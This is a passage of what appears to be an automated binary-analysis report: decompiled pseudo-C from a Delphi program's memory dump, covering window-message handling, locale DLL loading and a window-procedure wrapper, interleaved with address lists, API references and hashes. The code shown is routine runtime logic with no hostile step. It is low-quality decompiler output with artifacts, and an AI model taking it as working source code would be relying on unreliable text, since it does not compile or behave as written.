                                                                        				struct HWND__* _t222;
                                                                        				struct HWND__* _t224;
                                                                        				struct HWND__* _t227;
                                                                        				struct HWND__* _t231;
                                                                        				struct HWND__* _t245;
                                                                        				struct HWND__* _t249;
                                                                        				struct HWND__* _t251;
                                                                        				struct HWND__* _t252;
                                                                        				struct HWND__* _t264;
                                                                        				intOrPtr _t267;
                                                                        				struct HWND__* _t270;
                                                                        				intOrPtr* _t271;
                                                                        				struct HWND__* _t279;
                                                                        				struct HWND__* _t281;
                                                                        				struct HWND__* _t292;
                                                                        				void* _t301;
                                                                        				signed int _t303;
                                                                        				struct HWND__* _t309;
                                                                        				struct HWND__* _t310;
                                                                        				struct HWND__* _t311;
                                                                        				void* _t312;
                                                                        				intOrPtr _t335;
                                                                        				struct HWND__* _t339;
                                                                        				intOrPtr _t361;
                                                                        				void* _t365;
                                                                        				struct HWND__* _t370;
                                                                        				void* _t371;
                                                                        				void* _t372;
                                                                        				intOrPtr _t373;
                                                                        
                                                                        				_t312 = __ecx;
                                                                        				_push(_t365);
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t372);
                                                                        				_push(0x455f10);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t373;
                                                                        				 *(_v12 + 0xc) = 0;
                                                                        				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
                                                                        				if(_t301 < 0) {
                                                                        					L5:
                                                                        					E00455734(_v8, _t312, _v12);
                                                                        					_t303 =  *_v12;
                                                                        					_t161 = _t303;
                                                                        					__eflags = _t161 - 0x53;
                                                                        					if(__eflags > 0) {
                                                                        						__eflags = _t161 - 0xb017;
                                                                        						if(__eflags > 0) {
                                                                        							__eflags = _t161 - 0xb020;
                                                                        							if(__eflags > 0) {
                                                                        								_t162 = _t161 - 0xb031;
                                                                        								__eflags = _t162;
                                                                        								if(_t162 == 0) {
                                                                        									_t163 = _v12;
                                                                        									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
                                                                        									if( *((intOrPtr*)(_t163 + 4)) != 1) {
                                                                        										 *(_v8 + 0xb0) =  *(_v12 + 8);
                                                                        									} else {
                                                                        										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
                                                                        									}
                                                                        									L99:
                                                                        									_t166 = 0;
                                                                        									_pop(_t335);
                                                                        									 *[fs:eax] = _t335;
                                                                        									goto L100;
                                                                        								}
                                                                        								__eflags = _t162 + 0xfffffff2 - 2;
                                                                        								if(_t162 + 0xfffffff2 - 2 < 0) {
                                                                        									 *(_v12 + 0xc) = E004577D8(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
                                                                        								} else {
                                                                        									L98:
                                                                        									E004557F8(_t372); // executed
                                                                        								}
                                                                        								goto L99;
                                                                        							}
                                                                        							if(__eflags == 0) {
                                                                        								_t176 = _v12;
                                                                        								__eflags =  *(_t176 + 4);
                                                                        								if( *(_t176 + 4) != 0) {
                                                                        									E0045647C(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                                        								} else {
                                                                        									E00456420(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                                        								}
                                                                        								goto L99;
                                                                        							}
                                                                        							_t185 = _t161 - 0xb01a;
                                                                        							__eflags = _t185;
                                                                        							if(_t185 == 0) {
                                                                        								_t188 = IsIconic( *(_v8 + 0x30));
                                                                        								__eflags = _t188;
                                                                        								if(_t188 == 0) {
                                                                        									_t189 = GetFocus();
                                                                        									_t339 = _v8;
                                                                        									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
                                                                        									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
                                                                        										_t191 = E0044D7A0(0);
                                                                        										__eflags = _t191;
                                                                        										if(_t191 != 0) {
                                                                        											SetFocus(_t191);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L99;
                                                                        							}
                                                                        							__eflags = _t185 == 5;
                                                                        							if(_t185 == 5) {
                                                                        								L88:
                                                                        								E00456960(_v8,  *(_v12 + 8),  *(_v12 + 4));
                                                                        								goto L99;
                                                                        							} else {
                                                                        								goto L98;
                                                                        							}
                                                                        						}
                                                                        						if(__eflags == 0) {
                                                                        							_t197 =  *(_v8 + 0x44);
                                                                        							__eflags = _t197;
                                                                        							if(_t197 != 0) {
                                                                        								_t367 = _t197;
                                                                        								_t199 = E0043CC2C(_t197);
                                                                        								__eflags = _t199;
                                                                        								if(_t199 != 0) {
                                                                        									_t202 = IsWindowEnabled(E0043CC2C(_t367));
                                                                        									__eflags = _t202;
                                                                        									if(_t202 != 0) {
                                                                        										_t205 = IsWindowVisible(E0043CC2C(_t367));
                                                                        										__eflags = _t205;
                                                                        										if(_t205 != 0) {
                                                                        											 *0x47aaf4 = 0;
                                                                        											_t206 = GetFocus();
                                                                        											SetFocus(E0043CC2C(_t367));
                                                                        											E00437760(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
                                                                        											SetFocus(_t206);
                                                                        											 *0x47aaf4 = 1;
                                                                        											 *(_v12 + 0xc) = 1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							goto L99;
                                                                        						}
                                                                        						__eflags = _t161 - 0xb000;
                                                                        						if(__eflags > 0) {
                                                                        							_t216 = _t161 - 0xb001;
                                                                        							__eflags = _t216;
                                                                        							if(_t216 == 0) {
                                                                        								_t217 = _v8;
                                                                        								__eflags =  *((short*)(_t217 + 0xf2));
                                                                        								if( *((short*)(_t217 + 0xf2)) != 0) {
                                                                        									 *((intOrPtr*)(_v8 + 0xf0))();
                                                                        								}
                                                                        								goto L99;
                                                                        							}
                                                                        							__eflags = _t216 == 0x15;
                                                                        							if(_t216 == 0x15) {
                                                                        								_t222 = E004562F8(_v8, _t312, _v12);
                                                                        								__eflags = _t222;
                                                                        								if(_t222 != 0) {
                                                                        									 *(_v12 + 0xc) = 1;
                                                                        								}
                                                                        								goto L99;
                                                                        							} else {
                                                                        								goto L98;
                                                                        							}
                                                                        						}
                                                                        						if(__eflags == 0) {
                                                                        							_t224 = _v8;
                                                                        							__eflags =  *((short*)(_t224 + 0xfa));
                                                                        							if( *((short*)(_t224 + 0xfa)) != 0) {
                                                                        								 *((intOrPtr*)(_v8 + 0xf8))();
                                                                        							}
                                                                        							goto L99;
                                                                        						}
                                                                        						_t227 = _t161 - 0x112;
                                                                        						__eflags = _t227;
                                                                        						if(_t227 == 0) {
                                                                        							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
                                                                        							__eflags = _t231;
                                                                        							if(_t231 == 0) {
                                                                        								E00455F74(_v8);
                                                                        							} else {
                                                                        								__eflags = _t231 == 0x100;
                                                                        								if(_t231 == 0x100) {
                                                                        									E00456024(_v8);
                                                                        								} else {
                                                                        									E004557F8(_t372);
                                                                        								}
                                                                        							}
                                                                        							goto L99;
                                                                        						}
                                                                        						__eflags = _t227 + 0xffffffe0 - 7;
                                                                        						if(_t227 + 0xffffffe0 - 7 < 0) {
                                                                        							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
                                                                        							goto L99;
                                                                        						} else {
                                                                        							goto L98;
                                                                        						}
                                                                        					}
                                                                        					if(__eflags == 0) {
                                                                        						goto L88;
                                                                        					}
                                                                        					__eflags = _t161 - 0x16;
                                                                        					if(__eflags > 0) {
                                                                        						__eflags = _t161 - 0x1d;
                                                                        						if(__eflags > 0) {
                                                                        							_t245 = _t161 - 0x37;
                                                                        							__eflags = _t245;
                                                                        							if(_t245 == 0) {
                                                                        								 *(_v12 + 0xc) = E00455F58(_v8);
                                                                        								goto L99;
                                                                        							}
                                                                        							__eflags = _t245 == 0x13;
                                                                        							if(_t245 == 0x13) {
                                                                        								_t249 = _v12;
                                                                        								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
                                                                        								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
                                                                        									_t251 = _v8;
                                                                        									__eflags =  *((char*)(_t251 + 0x9e));
                                                                        									if( *((char*)(_t251 + 0x9e)) != 0) {
                                                                        										_t252 = _v8;
                                                                        										__eflags =  *(_t252 + 0xa0);
                                                                        										if( *(_t252 + 0xa0) != 0) {
                                                                        											 *(_v12 + 0xc) = 0;
                                                                        										} else {
                                                                        											_t309 = E0040BBC8("vcltest3.dll", _t303, 0x8000);
                                                                        											 *(_v8 + 0xa0) = _t309;
                                                                        											__eflags = _t309;
                                                                        											if(_t309 == 0) {
                                                                        												 *(_v12 + 0xc) = GetLastError();
                                                                        												 *(_v8 + 0xa0) = 0;
                                                                        											} else {
                                                                        												 *(_v12 + 0xc) = 0;
                                                                        												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
                                                                        												_t310 = _t370;
                                                                        												__eflags = _t370;
                                                                        												if(_t370 != 0) {
                                                                        													_t264 =  *(_v12 + 8);
                                                                        													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L99;
                                                                        							} else {
                                                                        								goto L98;
                                                                        							}
                                                                        						}
                                                                        						if(__eflags == 0) {
                                                                        							_t267 =  *0x496c08; // 0x217094c
                                                                        							E00454D9C(_t267);
                                                                        							E004557F8(_t372);
                                                                        							goto L99;
                                                                        						}
                                                                        						_t270 = _t161 - 0x1a;
                                                                        						__eflags = _t270;
                                                                        						if(_t270 == 0) {
                                                                        							_t271 =  *0x495bf8; // 0x496b6c
                                                                        							E00441478( *_t271, _t312,  *(_v12 + 4));
                                                                        							E0045578C(_v8, _t303, _t312, _v12, _t365);
                                                                        							E004557F8(_t372);
                                                                        							goto L99;
                                                                        						}
                                                                        						__eflags = _t270 == 2;
                                                                        						if(_t270 == 2) {
                                                                        							E004557F8(_t372);
                                                                        							_t279 = _v12;
                                                                        							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
                                                                        							asm("sbb eax, eax");
                                                                        							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
                                                                        							_t281 = _v12;
                                                                        							__eflags =  *(_t281 + 4);
                                                                        							if( *(_t281 + 4) == 0) {
                                                                        								E00455688();
                                                                        								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
                                                                        							} else {
                                                                        								E00455698(_v8);
                                                                        								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
                                                                        							}
                                                                        							goto L99;
                                                                        						} else {
                                                                        							goto L98;
                                                                        						}
                                                                        					}
                                                                        					if(__eflags == 0) {
                                                                        						_t292 = _v12;
                                                                        						__eflags =  *(_t292 + 4);
                                                                        						if( *(_t292 + 4) != 0) {
                                                                        							 *((char*)(_v8 + 0x9c)) = 1;
                                                                        						}
                                                                        						goto L99;
                                                                        					}
                                                                        					__eflags = _t161 - 0x14;
                                                                        					if(_t161 > 0x14) {
                                                                        						goto L98;
                                                                        					}
                                                                        					switch( *((intOrPtr*)(_t161 * 4 +  &M00455924))) {
                                                                        						case 0:
                                                                        							__eax = E0041C0B0();
                                                                        							goto L99;
                                                                        						case 1:
                                                                        							goto L98;
                                                                        						case 2:
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							_push(0xb01a);
                                                                        							_v8 =  *(_v8 + 0x30);
                                                                        							_push( *(_v8 + 0x30));
                                                                        							L004070E4();
                                                                        							__eax = E004557F8(__ebp);
                                                                        							goto L99;
                                                                        						case 3:
                                                                        							__eax = _v12;
                                                                        							__eflags =  *(__eax + 4);
                                                                        							if( *(__eax + 4) == 0) {
                                                                        								__eax = E004557F8(__ebp);
                                                                        								__eax = _v8;
                                                                        								__eflags =  *(__eax + 0xac);
                                                                        								if( *(__eax + 0xac) == 0) {
                                                                        									__eax = _v8;
                                                                        									__eax =  *(_v8 + 0x30);
                                                                        									__eax = E0044D650( *(_v8 + 0x30), __ebx, __edi, __esi);
                                                                        									__edx = _v8;
                                                                        									 *(_v8 + 0xac) = __eax;
                                                                        								}
                                                                        								_v8 = L00455690();
                                                                        							} else {
                                                                        								_v8 = E00455698(_v8);
                                                                        								__eax = _v8;
                                                                        								__eax =  *(_v8 + 0xac);
                                                                        								__eflags = __eax;
                                                                        								if(__eax != 0) {
                                                                        									__eax = _v8;
                                                                        									__edx = 0;
                                                                        									__eflags = 0;
                                                                        									 *(_v8 + 0xac) = 0;
                                                                        								}
                                                                        								__eax = E004557F8(__ebp);
                                                                        							}
                                                                        							goto L99;
                                                                        						case 4:
                                                                        							__eax = _v8;
                                                                        							__eax =  *(_v8 + 0x30);
                                                                        							_push(__eax);
                                                                        							L00407044();
                                                                        							__eflags = __eax;
                                                                        							if(__eax == 0) {
                                                                        								__eax = E004557F8(__ebp);
                                                                        							} else {
                                                                        								__eax = E00455834(__ebp);
                                                                        							}
                                                                        							goto L99;
                                                                        						case 5:
                                                                        							__eax = _v8;
                                                                        							__eax =  *(_v8 + 0x44);
                                                                        							__eflags = __eax;
                                                                        							if(__eax != 0) {
                                                                        								__eax = E00453004(__eax, __ecx);
                                                                        							}
                                                                        							goto L99;
                                                                        						case 6:
                                                                        							__eax = _v12;
                                                                        							 *_v12 = 0x27;
                                                                        							__eax = E004557F8(__ebp);
                                                                        							goto L99;
                                                                        					}
                                                                        				} else {
                                                                        					_t311 = _t301 + 1;
                                                                        					_t371 = 0;
                                                                        					L2:
                                                                        					L2:
                                                                        					if( *((intOrPtr*)(E00414208( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						_t166 = 0;
                                                                        						_pop(_t361);
                                                                        						 *[fs:eax] = _t361;
                                                                        					}
                                                                        					L100:
                                                                        					return _t166;
                                                                        					L4:
                                                                        					_t371 = _t371 + 1;
                                                                        					_t311 = _t311 - 1;
                                                                        					__eflags = _t311;
                                                                        					if(_t311 != 0) {
                                                                        						goto L2;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        			}
                                                                        0x004559c5
                                                                        0x00455db5
                                                                        0x00455db8
                                                                        0x00455dc0
                                                                        0x00455dd2
                                                                        0x00455dd2
                                                                        0x00000000
                                                                        0x00455dc0
                                                                        0x004559cb
                                                                        0x004559cb
                                                                        0x004559d0
                                                                        0x00455a49
                                                                        0x00455a49
                                                                        0x00455a4e
                                                                        0x00455a5c
                                                                        0x00455a50
                                                                        0x00455a50
                                                                        0x00455a55
                                                                        0x00455a69
                                                                        0x00455a57
                                                                        0x00455a74
                                                                        0x00455a79
                                                                        0x00455a55
                                                                        0x00000000
                                                                        0x00455a4e
                                                                        0x004559d5
                                                                        0x004559d8
                                                                        0x00455c01
                                                                        0x00000000
                                                                        0x004559de
                                                                        0x00000000
                                                                        0x004559de
                                                                        0x004559d8
                                                                        0x00455903
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455909
                                                                        0x0045590c
                                                                        0x00455978
                                                                        0x0045597b
                                                                        0x0045599a
                                                                        0x0045599a
                                                                        0x0045599d
                                                                        0x00455adf
                                                                        0x00000000
                                                                        0x00455adf
                                                                        0x004559a3
                                                                        0x004559a6
                                                                        0x00455c25
                                                                        0x00455c2b
                                                                        0x00455c31
                                                                        0x00455c37
                                                                        0x00455c3a
                                                                        0x00455c41
                                                                        0x00455c47
                                                                        0x00455c4a
                                                                        0x00455c51
                                                                        0x00455cd1
                                                                        0x00455c53
                                                                        0x00455c62
                                                                        0x00455c67
                                                                        0x00455c6d
                                                                        0x00455c6f
                                                                        0x00455cb9
                                                                        0x00455cc1
                                                                        0x00455c71
                                                                        0x00455c76
                                                                        0x00455c8d
                                                                        0x00455c8f
                                                                        0x00455c91
                                                                        0x00455c93
                                                                        0x00455c9c
                                                                        0x00455caa
                                                                        0x00455caa
                                                                        0x00455c93
                                                                        0x00455c6f
                                                                        0x00455c51
                                                                        0x00455c41
                                                                        0x00000000
                                                                        0x004559ac
                                                                        0x00000000
                                                                        0x004559ac
                                                                        0x004559a6
                                                                        0x0045597d
                                                                        0x00455ee5
                                                                        0x00455eea
                                                                        0x00455ef0
                                                                        0x00000000
                                                                        0x00455ef5
                                                                        0x00455983
                                                                        0x00455983
                                                                        0x00455986
                                                                        0x00455ec5
                                                                        0x00455ecc
                                                                        0x00455ed7
                                                                        0x00455edd
                                                                        0x00000000
                                                                        0x00455ee2
                                                                        0x0045598c
                                                                        0x0045598f
                                                                        0x00455b09
                                                                        0x00455b0f
                                                                        0x00455b12
                                                                        0x00455b16
                                                                        0x00455b1c
                                                                        0x00455b22
                                                                        0x00455b25
                                                                        0x00455b29
                                                                        0x00455b50
                                                                        0x00455b65
                                                                        0x00455b2b
                                                                        0x00455b2e
                                                                        0x00455b43
                                                                        0x00455b43
                                                                        0x00000000
                                                                        0x00455995
                                                                        0x00000000
                                                                        0x00455995
                                                                        0x0045598f
                                                                        0x0045590e
                                                                        0x00455c09
                                                                        0x00455c0c
                                                                        0x00455c10
                                                                        0x00455c19
                                                                        0x00455c19
                                                                        0x00000000
                                                                        0x00455c10
                                                                        0x00455914
                                                                        0x00455917
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045591d
                                                                        0x00000000
                                                                        0x00455ef8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455ae7
                                                                        0x00455ae9
                                                                        0x00455aeb
                                                                        0x00455af3
                                                                        0x00455af6
                                                                        0x00455af7
                                                                        0x00455afd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455b6f
                                                                        0x00455b72
                                                                        0x00455b76
                                                                        0x00455baa
                                                                        0x00455bb0
                                                                        0x00455bb3
                                                                        0x00455bba
                                                                        0x00455bbc
                                                                        0x00455bbf
                                                                        0x00455bc2
                                                                        0x00455bc7
                                                                        0x00455bca
                                                                        0x00455bca
                                                                        0x00455bd3
                                                                        0x00455b78
                                                                        0x00455b7b
                                                                        0x00455b80
                                                                        0x00455b83
                                                                        0x00455b89
                                                                        0x00455b8b
                                                                        0x00455b92
                                                                        0x00455b95
                                                                        0x00455b95
                                                                        0x00455b97
                                                                        0x00455b97
                                                                        0x00455b9e
                                                                        0x00455ba3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455a97
                                                                        0x00455a9a
                                                                        0x00455a9d
                                                                        0x00455a9e
                                                                        0x00455aa3
                                                                        0x00455aa5
                                                                        0x00455ab4
                                                                        0x00455aa7
                                                                        0x00455aa8
                                                                        0x00455aad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455a7f
                                                                        0x00455a82
                                                                        0x00455a85
                                                                        0x00455a87
                                                                        0x00455a8d
                                                                        0x00455a8d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455abf
                                                                        0x00455ac2
                                                                        0x00455ac9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004558b6
                                                                        0x004558b6
                                                                        0x004558b7
                                                                        0x00000000
                                                                        0x004558b9
                                                                        0x004558d5
                                                                        0x00000000
                                                                        0x004558d7
                                                                        0x004558d7
                                                                        0x004558d9
                                                                        0x004558dc
                                                                        0x004558dc
                                                                        0x00455f25
                                                                        0x00455f2b
                                                                        0x004558e4
                                                                        0x004558e4
                                                                        0x004558e5
                                                                        0x004558e5
                                                                        0x004558e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004558e6

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RegisterAutomation$lkI$vcltest3.dll
                                                                        • API String ID: 0-607161752
                                                                        • Opcode ID: e7a79aa871f1fbd69609875c6ded9006c70b9e62cc30c7898b5dd607c31d3f82
                                                                        • Instruction ID: f2d9504c2ba57309c7552e980363ea0a8989d55f74f96697af3e275cc6580183
                                                                        • Opcode Fuzzy Hash: e7a79aa871f1fbd69609875c6ded9006c70b9e62cc30c7898b5dd607c31d3f82
                                                                        • Instruction Fuzzy Hash: D9E1AD31A00A05DFDB10DB69C595A6EB7F1AF08311F2881A6FD059B363D738EE49DB09
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			E00405DAC() {
                                                                        				void* _t28;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				struct HINSTANCE__* _t42;
                                                                        				char* _t51;
                                                                        				void* _t52;
                                                                        				struct HINSTANCE__* _t59;
                                                                        				void* _t61;
                                                                        
                                                                        				_push(0x105);
                                                                        				_push( *((intOrPtr*)(_t61 - 4)));
                                                                        				_push(_t61 - 0x11d);
                                                                        				L00401338();
                                                                        				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                                                        				_t59 = 0;
                                                                        				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                                                        					L14:
                                                                        					return _t59;
                                                                        				} else {
                                                                        					_t28 = _t61 - 0x11d;
                                                                        					_push(_t28);
                                                                        					L00401340();
                                                                        					_t51 = _t28 + _t61 - 0x11d;
                                                                        					L5:
                                                                        					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                                                        						_t51 = _t51 - 1;
                                                                        						goto L5;
                                                                        					}
                                                                        					_t30 = _t61 - 0x11d;
                                                                        					if(_t51 != _t30) {
                                                                        						_t52 = _t51 + 1;
                                                                        						if( *((char*)(_t61 - 0x12)) != 0) {
                                                                        							_push(0x105 - _t52 - _t30);
                                                                        							_push(_t61 - 0x12);
                                                                        							_push(_t52);
                                                                        							L00401338();
                                                                        							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                                                        						}
                                                                        						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                                                        							_push(0x105 - _t52 - _t61 - 0x11d);
                                                                        							_push(_t61 - 0xd);
                                                                        							_push(_t52);
                                                                        							L00401338();
                                                                        							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                        							_t59 = _t36;
                                                                        							if(_t59 == 0) {
                                                                        								 *((char*)(_t61 - 0xb)) = 0;
                                                                        								_push(0x105 - _t52 - _t61 - 0x11d);
                                                                        								_push(_t61 - 0xd);
                                                                        								_push(_t52);
                                                                        								L00401338();
                                                                        								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                        								_t59 = _t42;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L14;
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
                                                                        • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
                                                                        • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1599918012-2375825460
                                                                        • Opcode ID: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
                                                                        • Instruction ID: a95c978ba0d7d151ab845f00ccb1e953877a4a526e1e70593208f9c5fde5a4dc
                                                                        • Opcode Fuzzy Hash: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
                                                                        • Instruction Fuzzy Hash: 6F318F71E0061C6AFB25D6B8DC46BDF6AAC8B04344F4401F7AA44F61C1E6789F848F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        			E004557F8(intOrPtr _a4) {
                                                                        				intOrPtr _t26;
                                                                        
                                                                        				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                                                                        				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                                                                        				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                                                                        				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                                                                        				_push(_t26); // executed
                                                                        				L00406D8C(); // executed
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                                                                        				return _t26;
                                                                        			}





                                                                        APIs
                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00455822
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: NtdllProc_Window
                                                                        • String ID:
                                                                        • API String ID: 4255912815-0
                                                                        • Opcode ID: b07c49574a18f71dbeb9c9cb54d623c337995a7866a732a5a16d698ec8b3bfc5
                                                                        • Instruction ID: 5803e6755cc40272ac919c0989782a04df59f5dce5c0c45c60d630398e48ec52
                                                                        • Opcode Fuzzy Hash: b07c49574a18f71dbeb9c9cb54d623c337995a7866a732a5a16d698ec8b3bfc5
                                                                        • Instruction Fuzzy Hash: 44F0C579215608AFCB40DF9DC588D4AFBE8BF4C260B058195BD88CB321C234FD808F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 42%
                                                                        			E00455364(void* __eax, void* __ebx, void* __ecx) {
                                                                        				struct _WNDCLASSA _v44;
                                                                        				char _v48;
                                                                        				char* _t22;
                                                                        				long _t23;
                                                                        				CHAR* _t25;
                                                                        				struct HINSTANCE__* _t26;
                                                                        				intOrPtr* _t28;
                                                                        				signed int _t31;
                                                                        				intOrPtr* _t32;
                                                                        				signed int _t35;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				void* _t38;
                                                                        				CHAR* _t39;
                                                                        				struct HWND__* _t40;
                                                                        				char* _t46;
                                                                        				char* _t51;
                                                                        				long _t54;
                                                                        				long _t58;
                                                                        				struct HINSTANCE__* _t61;
                                                                        				intOrPtr _t63;
                                                                        				void* _t68;
                                                                        				struct HMENU__* _t69;
                                                                        				intOrPtr _t76;
                                                                        				void* _t82;
                                                                        				short _t87;
